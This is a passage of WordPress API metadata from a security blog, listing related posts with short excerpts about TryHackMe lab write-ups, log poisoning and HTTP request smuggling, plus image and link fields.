m\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":359,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/28\/tryhackme-reset\/","url_meta":{"origin":447,"position":0},"title":"TryHackMe: Reset","author":"ishsome","date":"January 28, 2024","format":false,"excerpt":"Reset is a Windows machine that is part of a domain and consists of many misconfigurations. Our goal is to perform a Pentest as a Red Teamer and exploit the misconfigurations to become the Administrator on the machine. We will begin our enumeration with NMAP as usual. NMAP \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Windows-Boxes\/Reset] \u2514\u2500$\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-51.png?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":103,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-umbrella\/","url_meta":{"origin":447,"position":1},"title":"TryHackMe: Umbrella","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Umbrella from TryHackMe is a Linux machine with multiple misconfigurations. To get a foothold, we need to perform enumeration on the Docker Registry and obtain credentials for the MySQL database. By accessing the DB, we can get usernames and passwords for multiple users to log in to a webpage and\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/umbrella.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":422,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/","url_meta":{"origin":447,"position":2},"title":"TryHackMe: Kitty","author":"ishsome","date":"February 5, 2024","format":false,"excerpt":"Kitty from TryHackMe is a Linux machine running a web application with security vulnerabilities. We are tasked with finding the vulnerabilities and exploiting them to gain root privileges on the machine. NMAP We have only two ports open 22 for SSH and HTTP port 80. \u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty] \u2514\u2500$ nmap -p22,80 10.10.113.181\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":168,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/24\/tryhackme-bulletproof-penguin\/","url_meta":{"origin":447,"position":3},"title":"TryHackMe: Bulletproof Penguin","author":"ishsome","date":"January 24, 2024","format":false,"excerpt":"Bulletproof plugin\u00a0is an easy room that deals with hardening security on the common services that run on a Linux machine. This room covers services such as FTP, MySQL, Redis, SSH, etc., and how their configurations can be changed to secure them from unauthorized access. Our goal in each task is\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-32.png?resize=700%2C400&ssl=1 2x"},"classes":[]},{"id":434,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/03\/what-is-log-poisoning\/","url_meta":{"origin":447,"position":4},"title":"What Is Log Poisoning?","author":"ishsome","date":"February 3, 2024","format":false,"excerpt":"Logs are records generated by various software applications, operating systems, and network devices to keep track of events and activities. They are essential for monitoring, troubleshooting, and security analysis. Log poisoning typically refers to malicious activities or techniques aimed at manipulating or contaminating log files in computer systems. Log poisoning\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":306,"url":"https:\/\/blog.ishsome.com\/index.php\/2024\/01\/27\/http-request-smuggling\/","url_meta":{"origin":447,"position":5},"title":"HTTP Request Smuggling","author":"ishsome","date":"January 27, 2024","format":false,"excerpt":"This blog is based on the HHTP Request Smuggling room from TryHackMe. What is HTTP Request Smuggling? HTTP Request Smuggling is a vulnerability that arises when there are mismatches in different web infrastructure components. This includes proxies, load balancers, and servers that interpret the boundaries of HTTP requests. Request splitting\u2026","rel":"","context":"In &quot;Blog&quot;","block_context":{"text":"Blog","link":"https:\/\/blog.ishsome.com\/index.php\/category\/blog\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/01\/image-34.png?resize=1050%2C600&ssl=1 3x"},"classes":[]}],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/447","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=447"}],"version-history":[{"count":26,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/447\/revisions"}],"predecessor-version":[{"id":596,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/447\/revisions\/596"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}